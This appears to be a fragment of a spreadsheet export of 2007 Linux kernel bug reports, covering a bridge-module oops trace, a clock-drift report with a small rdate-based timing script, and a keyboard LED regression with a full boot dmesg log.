21:20:19 plop kernel: Stack: cd566744 eff4e86c 00000296 eff0bf84 c012534a eff0bf70 00000296 eff0bfa0 Feb 7 21:20:19 plop kernel: eff0bfac cd566740 f0eed6cf eff4e86c eff03ec8 eff0bfb4 eff0bfc4 c012590d Feb 7 21:20:19 plop kernel: 00000001 00000000 00000001 00010000 00000000 00000000 eff09530 c0114770 Feb 7 21:20:19 plop kernel: Call Trace: Feb 7 21:20:19 plop kernel: [show_trace_log_lvl+26/47] show_trace_log_lvl+0x1a/0x2f Feb 7 21:20:19 plop kernel: [&lt;c010422c&gt;] show_trace_log_lvl+0x1a/0x2f Feb 7 21:20:19 plop kernel: [show_stack_log_lvl+155/163] show_stack_log_lvl+0x9b/0xa3 Feb 7 21:20:19 plop kernel: [&lt;c01042dc&gt;] show_stack_log_lvl+0x9b/0xa3 Feb 7 21:20:19 plop kernel: [show_registers+402/616] show_registers+0x192/0x268 Feb 7 21:20:19 plop kernel: [&lt;c0104476&gt;] show_registers+0x192/0x268 Feb 7 21:20:19 plop kernel: [die+234/511] die+0xea/0x1ff Feb 7 21:20:19 plop kernel: [&lt;c0104636&gt;] die+0xea/0x1ff Feb 7 21:20:19 plop kernel: [do_page_fault+1111/1334] do_page_fault+0x457/0x536 Feb 7 21:20:19 plop kernel: [&lt;c02c0c73&gt;] do_page_fault+0x457/0x536 Feb 7 21:20:19 plop kernel: [error_code+116/128] error_code+0x74/0x80 Feb 7 21:20:19 plop kernel: [&lt;c02bf624&gt;] error_code+0x74/0x80 Feb 7 21:20:19 plop kernel: [run_workqueue+142/333] run_workqueue+0x8e/0x14d Feb 7 21:20:19 plop kernel: [&lt;c012534a&gt;] run_workqueue+0x8e/0x14d Feb 7 21:20:19 plop kernel: [worker_thread+260/302] worker_thread+0x104/0x12e Feb 7 21:20:19 plop kernel: [&lt;c012590d&gt;] worker_thread+0x104/0x12e Feb 7 21:20:19 plop kernel: [kthread+163/206] kthread+0xa3/0xce Feb 7 21:20:19 plop kernel: [&lt;c0127e55&gt;] kthread+0xa3/0xce Feb 7 21:20:19 plop kernel: [kernel_thread_helper+7/16] kernel_thread_helper+0x7/0x10 Feb 7 21:20:19 plop kernel: [&lt;c0103ed7&gt;] kernel_thread_helper+0x7/0x10 Feb 7 21:20:19 plop kernel: ======================= Feb 7 21:20:19 plop kernel: Code: 38 cf 89 d8 5b 5e 5f 5d c3 55 89 e5 57 56 53 8b b0 24 ff ff ff 0f ba 30 00 e8 d3 20 38 cf 8b 9e 40 02 00 00 85 db 74 4c 8b 46 2c &lt;8b&gt; 3b a8 10 75 0a 89 f0 e8 e2 f9 ff ff 89 43 2c 8b 47 30 f6 40 Feb 7 21:20:19 plop kernel: EIP: [pg0+814360305/1067136000] port_carrier_check+0x22/0x75 [bridge] SS:ESP 0068:eff0bf4c Feb 7 21:20:19 plop kernel: EIP: [&lt;f0eed6f1&gt;] port_carrier_check+0x22/0x75 [bridge] SS:ESP 0068:eff0bf4c</t>
  </si>
  <si>
    <t>system time slowing down</t>
  </si>
  <si>
    <t>2007-02-08 01:07 UTC</t>
  </si>
  <si>
    <t>hajma</t>
  </si>
  <si>
    <t>2012-09-05 06:44 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.17.13 Distribution: Mandriva Hardware Environment: Athlon XP 1800+, 768MB RAM, PATA harddrives # lspci 00:00.0 Host bridge: VIA Technologies, Inc. VT8377 [KT400/KT600 AGP] Host Bridge 00:01.0 PCI bridge: VIA Technologies, Inc. VT8235 PCI Bridge 00:09.0 Ethernet controller: Broadcom Corporation BCM4401 100Base-T (rev 01) 00:0b.0 Multimedia audio controller: C-Media Electronics Inc CM8738 (rev 10) 00:0d.0 Network controller: Intersil Corporation Prism 2.5 Wavelan chipset (rev 01) 00:0f.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) 00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge 00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) 01:00.0 VGA compatible controller: nVidia Corporation NV17 [GeForce4 MX 440] (rev a3) # Software Environment: desktop, KDE, vanilla kernel 2.6.20, not tainted Problem Description: System time keeps slowing down at a rate of aprox. 1second/hour. Mandriva bug report: http://qa.mandriva.com/show_bug.cgi?id=28279 Appeared when I switched from Mandriva kernel 2.6.17.13 to Mandriva kernel 2.6.19.2. With mandriva kernel 2.6.20.0.rc6 the slowdown was 10seconds/hour, with mandriva kernel 2.6.20.0.rc7 it was back to 1sec/hour. Does not happen when I switch back to mandriva kernel 2.6.17.13 Steps to reproduce: I made a script to compare time from ntp server and log them: #!/bin/bash aaa=`LC_ALL=C rdate -p ntp.ujf.cas.cz | sed s/^.*]\\\t//g` bbb=`LC_ALL=C date --utc -d "$aaa" +%s` ccc=`date --utc +%s` n=$(($bbb - $ccc)) d=`LC_ALL=C date` echo $d,$n Time , difference in seconds: Thu Feb 8 00:11:07 CET 2007,3837 Thu Feb 8 01:11:01 CET 2007,3839 Thu Feb 8 02:11:02 CET 2007,3838 Thu Feb 8 03:11:01 CET 2007,3839 Thu Feb 8 04:11:01 CET 2007,3840 Thu Feb 8 05:11:02 CET 2007,3839 Thu Feb 8 06:11:02 CET 2007,3839 Thu Feb 8 07:11:03 CET 2007,3839 Thu Feb 8 08:11:01 CET 2007,3841 Thu Feb 8 09:11:01 CET 2007,3842</t>
  </si>
  <si>
    <t>Keyboard LEDs dont work</t>
  </si>
  <si>
    <t>2007-02-08 16:18 UTC</t>
  </si>
  <si>
    <t>2007-04-15 12:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18 Distribution: Debian sid Hardware Environment: Microsoft Natural Ergonomic Keyboard 4000, conntected to PS/2 via USB to PS/2 adapter Problem Description: After booting (and during booting) the keyboard LEDs (NumLock, CapsLock and ScrollLock) dont't work (they're always off). It happens on the console aswell as in X. Note that only the LEDs don't work, the function of Num/Caps/Scroll-Lock itself is ok, the LEDs just don't display the current state. Some changes must have been made to the input event system as the input devices get different /dev/event&lt;number&gt; than in 2.6.18. I've attached my dmesg (ask me for further information: Linux version 2.6.20 (root@euler) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP PREEMPT Wed Feb 7 18:34:52 CET 2007 Command line: root=/dev/sda1 ro snd-ice1724.index=0 snd-intel8x0.index=1 iommu=soft BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009b000 (usable) BIOS-e820: 000000000009b000 - 00000000000a0000 (reserved) BIOS-e820: 00000000000da000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000007ff80000 (usable) BIOS-e820: 000000007ff80000 - 000000007ff91000 (ACPI data) BIOS-e820: 000000007ff91000 - 0000000080000000 (ACPI NVS) BIOS-e820: 0000000080000000 - 000000009ff80000 (usable) BIOS-e820: 000000009ff80000 - 00000000a0000000 (reserved) BIOS-e820: 00000000e0000000 - 00000000f0000000 (reserved) BIOS-e820: 00000000fec00000 - 00000000fec00400 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) BIOS-e820: 00000000fff80000 - 0000000100000000 (reserved) BIOS-e820: 0000000100000000 - 0000000160000000 (usable) Entering add_active_range(0, 0, 155) 0 entries of 3200 used Entering add_active_range(0, 256, 524160) 1 entries of 3200 used Entering add_active_range(0, 524288, 655232) 2 entries of 3200 used Entering add_active_range(0, 1048576, 1441792) 3 entries of 3200 used end_pfn_map = 1441792 DMI present. ACPI: RSDP (v000 PTLTD ) @ 0x00000000000f78f0 ACPI: RSDT (v001 PTLTD RSDT 0x06040000 LTP 0x00000000) @ 0x000000007ff8b258 ACPI: FADT (v001 NVIDIA CK8S 0x06040000 PTL_ 0x000f4240) @ 0x000000007ff90b06 ACPI: SPCR (v001 PTLTD $UCRTBL$ 0x06040000 PTL 0x00000001) @ 0x000000007ff90b7a ACPI: MADT (v001 PTLTD APIC 0x06040000 LTP 0x00000000) @ 0x000000007ff90bca ACPI: BOOT (v001 PTLTD $SBFTBL$ 0x06040000 LTP 0x00000001) @ 0x000000007ff90c68 ACPI: SSDT (v001 PTLTD POWERNOW 0x06040000 LTP 0x00000001) @ 0x000000007ff90c90 ACPI: DSDT (v001 NVIDIA CK8 0x06040000 MSFT 0x0100000e) @ 0x0000000000000000 Scanning NUMA topology in Northbridge 24 Number of nodes 2 Node 0 using interleaving mode 1/0 No NUMA configuration found Faking a node at 0000000000000000-0000000160000000 Entering add_active_range(0, 0, 155) 0 entries of 3200 used Entering add_active_range(0, 256, 524160) 1 entries of 3200 used Entering add_active_range(0, 524288, 655232) 2 entries of 3200 used Entering add_active_range(0, 1048576, 1441792) 3 entries of 3200 used Bootmem setup node 0 0000000000000000-0000000160000000 Zone PFN ranges: DMA 0 -&gt; 4096 DMA32 4096 -&gt; 1048576 Normal 1048576 -&gt; 1441792 early_node_map[4] active PFN ranges 0: 0 -&gt; 155 0: 256 -&gt; 524160 0: 524288 -&gt; 655232 0: 1048576 -&gt; 1441792 On node 0 totalpages: 1048219 DMA zone: 56 pages used for memmap DMA zone: 1308 pages reserved DMA zone: 2631 pages, LIFO batch:0 DMA32 zone: 14280 pages used for memmap DMA32 zone: 636728 pages, LIFO batch:31 Normal zone: 5376 pages used for memmap Normal zone: 387840 pages, LIFO batch:31 Nvidia board detected. Ignoring ACPI timer override. If you got timer trouble try acpi_use_timer_override ACPI: PM-Timer IO Port: 0x8008 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Processor #0 (Bootup-CPU) ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) Processor #1 ACPI: LAPIC (acpi_id[0x02] lapic_id[0x02] enabled) Processor #2 ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled) Processor #3 ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x02] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x03] high edge lint[0x1]) ACPI: IOAPIC (id[0x04] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 4, address 0xfec00000, GSI 0-23 ACPI: IOAPIC (id[0x05] address[0xd0000000] gsi_base[24]) IOAPIC[1]: apic_id 5, address 0xd0000000, GSI 24-27 ACPI: IOAPIC (id[0x06] address[0xd0001000] gsi_base[28]) IOAPIC[2]: apic_id 6, address 0xd0001000, GSI 28-31 ACPI: IOAPIC (id[0x07] address[0xd0800000] gsi_base[32]) IOAPIC[3]: apic_id 7, address 0xd0800000, GSI 32-55 ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) ACPI: IRQ9 used by override. Setting APIC routing to flat Using ACPI (MADT) for SMP configuration information Nosave address range: 000000000009b000 - 00000000000a0000 Nosave address range: 00000000000a0000 - 00000000000da000 Nosave address range: 00000000000da000 - 0000000000100000 Nosave address range: 000000007ff80000 - 000000007ff91000 Nosave address range: 000000007ff91000 - 0000000080000000 Nosave address range: 000000009ff80000 - 00000000a0000000 Nosave address range: 00000000a0000000 - 00000000e0000000 Nosave address range: 00000000e0000000 - 00000000f0000000 Nosave address range: 00000000f0000000 - 00000000fec00000 Nosave address range: 00000000fec00000 - 00000000fee00000 Nosave address range: 00000000fee00000 - 00000000fee01000 Nosave address range: 00000000fee01000 - 00000000fff80000 Nosave address range: 00000000fff80000 - 0000000100000000 Allocating PCI resources starting at a4000000 (gap: a0000000:40000000) PERCPU: Allocating 32512 bytes of per cpu data Built 1 zonelists. Total pages: 1027199 Kernel command line: root=/dev/sda1 ro snd-ice1724.index=0 snd-intel8x0.index=1 iommu=soft Initializing CPU#0 PID hash table entries: 4096 (order: 12, 32768 bytes) Console: colour VGA+ 80x25 Dentry cache hash table entries: 524288 (order: 10, 4194304 bytes) Inode-cache hash table entries: 262144 (order: 9, 2097152 bytes) Checking aperture... CPU 0: aperture @ ac000000 size 64 MB CPU 1: aperture @ ac000000 size 64 MB PCI-DMA: Using software bounce buffering for IO (SWIOTLB) Placing software IO TLB between 0x1650000 - 0x5650000 Memory: 4036384k/5767168k available (3041k kernel code, 156492k reserved, 1318k data, 316k init) Calibrating delay using timer specific routine.. 4421.67 BogoMIPS (lpj=2210835) Security Framework v1.0.0 initialized Capability LSM initialized Mount-cache hash table entries: 256 CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 1024K (64 bytes/line) CPU 0/0 -&gt; Node 0 CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 Freeing SMP alternatives: 32k freed ACPI: Core revision 20060707 Using local APIC timer interrupts. result 12557931 Detected 12.557 MHz APIC timer. Booting processor 1/4 APIC 0x1 Initializing CPU#1 Calibrating delay using timer specific routine.. 4419.78 BogoMIPS (lpj=2209891) CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 1024K (64 bytes/line) CPU 1/1 -&gt; Node 0 CPU: Physical Processor ID: 0 CPU: Processor Core ID: 1 Dual Core AMD Opteron(tm) Processor 275 stepping 02 CPU 1: Syncing TSC to CPU 0. CPU 1: synchronized TSC with CPU 0 (last diff 0 cycles, maxerr 585 cycles) Booting processor 2/4 APIC 0x2 Initializing CPU#2 Calibrating delay using timer specific routine.. 4419.78 BogoMIPS (lpj=2209894) CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 1024K (64 bytes/line) CPU 2/2 -&gt; Node 0 CPU: Physical Processor ID: 1 CPU: Processor Core ID: 0 Dual Core AMD Opteron(tm) Processor 275 stepping 02 CPU 2: Syncing TSC to CPU 0. CPU 2: synchronized TSC with CPU 0 (last diff -122 cycles, maxerr 1087 cycles) Booting processor 3/4 APIC 0x3 Initializing CPU#3 Calibrating delay using timer specific routine.. 4419.73 BogoMIPS (lpj=2209866) CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 1024K (64 bytes/line) CPU 3/3 -&gt; Node 0 CPU: Physical Processor ID: 1 CPU: Processor Core ID: 1 Dual Core AMD Opteron(tm) Processor 275 stepping 02 CPU 3: Syncing TSC to CPU 0. CPU 3: synchronized TSC with CPU 0 (last diff -124 cycles, maxerr 1076 cycles) Brought up 4 CPUs testing NMI watchdog ... OK. Disabling vsyscall due to use of PM timer time.c: Using 3.579545 MHz WALL PM GTOD PM timer. time.c: Detected 2210.192 MHz processor. migration_cost=381 NET: Registered protocol family 16 ACPI: bus type pci registered PCI: Using configuration type 1 ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Probing PCI hardware (bus 00) ACPI: Assume root bridge [\_SB_.PCI0] bus is 0 PCI: Transparent bridge - 0000:00:09.0 Boot video device is 0000:02:00.0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P2P0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.XVR0._PRT] ACPI: PCI Interrupt Link [LNK1] (IRQs 16 17 18 19) *0 ACPI: PCI Interrupt Link [LNK2] (IRQs 16 17 18 19) *0 ACPI: PCI Interrupt Link [LNK3] (IRQs 16 17 18 19) *0 ACPI: PCI Interrupt Link [LNK4] (IRQs 16 17 18 19) *0 ACPI: PCI Interrupt Link [LNK5] (IRQs 16 17 18 19) *0, disabled. ACPI: PCI Interrupt Link [LSMB] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [LUS0] (IRQs 20 21 22 23) *0 ACPI: PCI Interrupt Link [LUS2] (IRQs 20 21 22 23) *0 ACPI: PCI Interrupt Link [LMAC] (IRQs 20 21 22 23) *0 ACPI: PCI Interrupt Link [LACI] (IRQs 20 21 22 23) *0 ACPI: PCI Interrupt Link [LMCI] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [LPID] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [LTID] (IRQs 20 21 22 23) *0 ACPI: PCI Interrupt Link [LSI1] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APCP] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Root Bridge [PCI2] (0000:10) PCI: Probing PCI hardware (bus 10) ACPI: Assume root bridge [\_SB_.PCI0] bus is 0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI2.G0PA._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI2.G0PB._PRT] ACPI: PCI Root Bridge [PCI1] (0000:80) PCI: Probing PCI hardware (bus 80) ACPI: Assume root bridge [\_SB_.PCI0] bus is 0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI1._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI1.XVR0._PRT] ACPI: PCI Interrupt Link [LNK1] (IRQs 48 49 50 51) *0, disabled. ACPI: PCI Interrupt Link [LNK2] (IRQs 48 49 50 51) *0, disabled. ACPI: PCI Interrupt Link [LNK3] (IRQs 48 49 50 51) *0, disabled. ACPI: PCI Interrupt Link [LNK4] (IRQs 48 49 50 51) *0, disabled. ACPI: PCI Interrupt Link [LNK5] (IRQs 48 49 50 51) *0, disabled. ACPI: PCI Interrupt Link [LUS0] (IRQs 52 53 54 55) *0, disabled. ACPI: PCI Interrupt Link [LUS2] (IRQs 52 53 54 55) *0, disabled. ACPI: PCI Interrupt Link [LMAC] (IRQs 52 53 54 55) *0, disabled. ACPI: PCI Interrupt Link [LACI] (IRQs 52 53 54 55) *0, disabled. ACPI: PCI Interrupt Link [LMCI] (IRQs 52 53 54 55) *0, disabled. ACPI: PCI Interrupt Link [LPID] (IRQs 52 53 54 55) *0, disabled. ACPI: PCI Interrupt Link [LTID] (IRQs 52 53 54 55) *0, disabled. ACPI: PCI Interrupt Link [LSI1] (IRQs 52 53 54 55) *0, disabled. Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init pnp: PnP ACPI: found 14 devices SCSI subsystem initialized libata version 2.00 loaded. usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report pnp: 00:02: ioport range 0x8000-0x807f could not be reserved pnp: 00:02: ioport range 0x8080-0x80ff has been reserved pnp: 00:02: ioport range 0x8400-0x847f has been reserved pnp: 00:02: ioport range 0x8480-0x84ff has been reserved pnp: 00:02: ioport range 0x8800-0x887f has been reserved pnp: 00:02: ioport range 0x8880-0x88ff has been reserved pnp: 00:02: ioport range 0xa000-0xa03f has been reserved pnp: 00:02: ioport range 0xa040-0xa07f has been reserved ieee1394: Initialized config rom entry `ip1394' PCI: Device 0000:01:05.0 not available because of resource collisions ohci1394: Failed to enable OHCI hardware PCI: Bridge: 0000:00:09.0 IO window: disabled. MEM window: b0100000-b01fffff PREFETCH window: disabled. PCI: Failed to allocate mem resource #6:20000@d0000000 for 0000:02:00.0 PCI: Bridge: 0000:00:0e.0 IO window: 2000-2fff MEM window: b1000000-b2ffffff PREFETCH window: c0000000-cfffffff PCI: Setting latency timer of device 0000:00:09.0 to 64 PCI: Setting latency timer of device 0000:00:0e.0 to 64 PCI: Bridge: 0000:10:0a.0 IO window: 3000-3fff MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:10:0b.0 IO window: 4000-4fff MEM window: d0100000-d05fffff PREFETCH window: a4000000-a41fffff PCI: Bridge: 0000:80:0e.0 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Setting latency timer of device 0000:80:0e.0 to 64 NET: Registered protocol family 2 IP route cache hash table entries: 131072 (order: 8, 1048576 bytes) TCP established hash table entries: 262144 (order: 10, 4194304 bytes) TCP bind hash table entries: 65536 (order: 8, 1048576 bytes) TCP: Hash tables configured (established 262144 bind 65536) TCP reno registered Simple Boot Flag at 0x36 set to 0x1 audit: initializing netlink socket (disabled) audit(1170932188.246:1): initialized VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 512 (order 0, 4096 bytes) io scheduler noop registered io scheduler anticipatory registered (default) io scheduler deadline registered io scheduler cfq registered PCI: Found disabled HT MSI Mapping on 0000:00:0e.0 PCI: Found enabled HT MSI Mapping on 0000:00:00.0 PCI: MSI quirk detected. PCI_BUS_FLAGS_NO_MSI set for 0000:10:0a.0 subordinate bus. PCI: MSI quirk detected. PCI_BUS_FLAGS_NO_MSI set for 0000:10:0b.0 subordinate bus. PCI: Found disabled HT MSI Mapping on 0000:80:0e.0 PCI: Found enabled HT MSI Mapping on 0000:80:00.0 PCI: Setting latency timer of device 0000:00:0e.0 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:0e.0:pcie00] PCI: Setting latency timer of device 0000:80:0e.0 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:80:0e.0:pcie00] input: Power Button (FF) as /class/input/input0 ACPI: Power Button (FF) [PWRF] input: Power Button (CM) as /class/input/input1 ACPI: Power Button (CM) [PWRB] Real Time Clock Driver v1.12ac Non-volatile memory driver v1.2 Linux agpgart interface v0.101 (c) Dave Jones Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing disabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A 00:08: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 loop: loaded (max 8 devices) nbd: registered device at major 43 forcedeth.c: Reverse Engineered nForce ethernet driver. Version 0.59. ACPI: PCI Interrupt Link [LMAC] enabled at IRQ 23 ACPI: PCI Interrupt 0000:00:0a.0[A] -&gt; Link [LMAC] -&gt; GSI 23 (level, high) -&gt; IRQ 23 PCI: Setting latency timer of device 0000:00:0a.0 to 64 forcedeth: using HIGHDMA eth0: forcedeth.c: subsystem: 010f1:2895 bound to 0000:00:0a.0 ACPI: PCI Interrupt Link [LMAC] enabled at IRQ 55 ACPI: PCI Interrupt 0000:80:0a.0[A] -&gt; Link [LMAC] -&gt; GSI 55 (level, high) -&gt; IRQ 55 PCI: Setting latency timer of device 0000:80:0a.0 to 64 forcedeth: using HIGHDMA eth1: forcedeth.c: subsystem: 010f1:2895 bound to 0000:80:0a.0 tun: Universal TUN/TAP device driver, 1.6 tun: (C) 1999-2004 Max Krasnyansky &lt;maxk@qualcomm.com&gt; Linux video capture interface: v2.00 Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx NFORCE-CK804: IDE controller at PCI slot 0000:00:06.0 NFORCE-CK804: chipset revision 242 NFORCE-CK804: not 100% native mode: will probe irqs later NFORCE-CK804: 0000:00:06.0 (rev f2) UDMA133 controller ide0: BM-DMA at 0x1c00-0x1c07, BIOS settings: hda:DMA, hdb:DMA ide1: BM-DMA at 0x1c08-0x1c0f, BIOS settings: hdc:pio, hdd:pio Probing IDE interface ide0... hda: Hitachi HDT725025VLAT80, ATA DISK drive hdb: PLEXTOR DVDR PX-760A, ATAPI CD/DVD-ROM drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... Probing IDE interface ide1... hda: max request size: 512KiB hda: 488397168 sectors (250059 MB) w/7372KiB Cache, CHS=30401/255/63, UDMA(133) hda: cache flushes supported hda: hda1 hda2 hda3 hdb: ATAPI 40X DVD-ROM DVD-R CD-R/RW drive, 2048kB Cache, UDMA(66) Uniform CD-ROM driver Revision: 3.20 sata_nv 0000:00:07.0: version 3.2 ACPI: PCI Interrupt Link [LTID] enabled at IRQ 22 ACPI: PCI Interrupt 0000:00:07.0[A] -&gt; Link [LTID] -&gt; GSI 22 (level, high) -&gt; IRQ 22 sata_nv 0000:00:07.0: Using ADMA mode PCI: Setting latency timer of device 0000:00:07.0 to 64 ata1: SATA max UDMA/133 cmd 0xFFFFC20000032480 ctl 0xFFFFC200000324A0 bmdma 0x1C10 irq 22 ata2: SATA max UDMA/133 cmd 0xFFFFC20000032580 ctl 0xFFFFC200000325A0 bmdma 0x1C18 irq 22 scsi0 : sata_nv ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata1.00: ATA-7, max UDMA/133, 488397168 sectors: LBA48 NCQ (depth 31/32) ata1.00: ata1: dev 0 multi count 16 ata1.00: configured for UDMA/133 scsi1 : sata_nv ata2: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata2.00: ATA-7, max UDMA/133, 488397168 sectors: LBA48 NCQ (depth 31/32) ata2.00: ata2: dev 0 multi count 16 ata2.00: configured for UDMA/133 scsi 0:0:0:0: Direct-Access ATA HDT722525DLA380 V44O PQ: 0 ANSI: 5 ata1: bounce limit 0xFFFFFFFFFFFFFFFF, segment boundary 0xFFFFFFFF, hw segs 61 SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB) sda: Write Protect is off sda: Mode Sense: 00 3a 00 00 SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB) sda: Write Protect is off sda: Mode Sense: 00 3a 00 00 SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA sda: sda1 sda2 sda3 sd 0:0:0:0: Attached scsi disk sda sd 0:0:0:0: Attached scsi generic sg0 type 0 scsi 1:0:0:0: Direct-Access ATA HDT722525DLA380 V44O PQ: 0 ANSI: 5 ata2: bounce limit 0xFFFFFFFFFFFFFFFF, segment boundary 0xFFFFFFFF, hw segs 61 SCSI device sdb: 488397168 512-byte hdwr sectors (250059 MB) sdb: Write Protect is off sdb: Mode Sense: 00 3a 00 00 SCSI device sdb: write cache: enabled, read cache: enabled, doesn't support DPO or FUA SCSI device sdb: 488397168 512-byte hdwr sectors (250059 MB) sdb: Write Protect is off sdb: Mode Sense: 00 3a 00 00 SCSI device sdb: write cache: enabled, read cache: enabled, doesn't support DPO or FUA sdb: sdb1 sd 1:0:0:0: Attached scsi disk sdb sd 1:0:0:0: Attached scsi generic sg1 type 0 ACPI: PCI Interrupt Link [LSI1] enabled at IRQ 21 ACPI: PCI Interrupt 0000:00:08.0[A] -&gt; Link [LSI1] -&gt; GSI 21 (level, high) -&gt; IRQ 21 sata_nv 0000:00:08.0: Using ADMA mode PCI: Setting latency timer of device 0000:00:08.0 to 64 ata3: SATA max UDMA/133 cmd 0xFFFFC20000034480 ctl 0xFFFFC200000344A0 bmdma 0x1C20 irq 21 ata4: SATA max UDMA/133 cmd 0xFFFFC20000034580 ctl 0xFFFFC200000345A0 bmdma 0x1C28 irq 21 scsi2 : sata_nv ata3: SATA link down (SStatus 0 SControl 300) scsi3 : sata_nv ata4: SATA link down (SStatus 0 SControl 300) Fusion MPT base driver 3.04.03 Copyright (c) 1999-2007 LSI Logic Corporation Fusion MPT SPI Host driver 3.04.03 ACPI: PCI Interrupt 0000:12:06.0[A] -&gt; GSI 30 (level, low) -&gt; IRQ 30 mptbase: Initiating ioc0 bringup ioc0: 53C1030: Capabilities={Initiator,Target} scsi4 : ioc0: LSI53C1030, FwRev=01032700h, Ports=1, MaxQ=255, IRQ=30 ACPI: PCI Interrupt 0000:12:06.1[B] -&gt; GSI 31 (level, low) -&gt; IRQ 31 mptbase: Initiating ioc1 bringup ioc1: 53C1030: Capabilities={Initiator,Target} scsi5 : ioc1: LSI53C1030, FwRev=01032700h, Ports=1, MaxQ=255, IRQ=31 Fusion MPT misc device (ioctl) driver 3.04.03 mptctl: Registered with Fusion MPT base driver mptctl: /dev/mptctl @ (major,minor=10,220) ieee1394: raw1394: /dev/raw1394 device initialized ACPI: PCI Interrupt Link [LUS2] enabled at IRQ 20 ACPI: PCI Interrupt 0000:00:02.1[B] -&gt; Link [LUS2] -&gt; GSI 20 (level, high) -&gt; IRQ 20 PCI: Setting latency timer of device 0000:00:02.1 to 64 ehci_hcd 0000:00:02.1: EHCI Host Controller ehci_hcd 0000:00:02.1: new USB bus registered, assigned bus number 1 ehci_hcd 0000:00:02.1: debug port 1 PCI: cache line size of 64 is not supported by device 0000:00:02.1 ehci_hcd 0000:00:02.1: irq 20, io mem 0xb0001000 ehci_hcd 0000:00:02.1: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 10 ports detected ACPI: PCI Interrupt 0000:12:04.2[C] -&gt; GSI 30 (level, low) -&gt; IRQ 30 ehci_hcd 0000:12:04.2: EHCI Host Controller ehci_hcd 0000:12:04.2: new USB bus registered, assigned bus number 2 ehci_hcd 0000:12:04.2: irq 30, io mem 0xd0100000 ehci_hcd 0000:12:04.2: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 usb usb2: configuration #1 chosen from 1 choice hub 2-0:1.0: USB hub found hub 2-0:1.0: 4 ports detected ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) ACPI: PCI Interrupt Link [LUS0] enabled at IRQ 23 ACPI: PCI Interrupt 0000:00:02.0[A] -&gt; Link [LUS0] -&gt; GSI 23 (level, high) -&gt; IRQ 23 PCI: Setting latency timer of device 0000:00:02.0 to 64 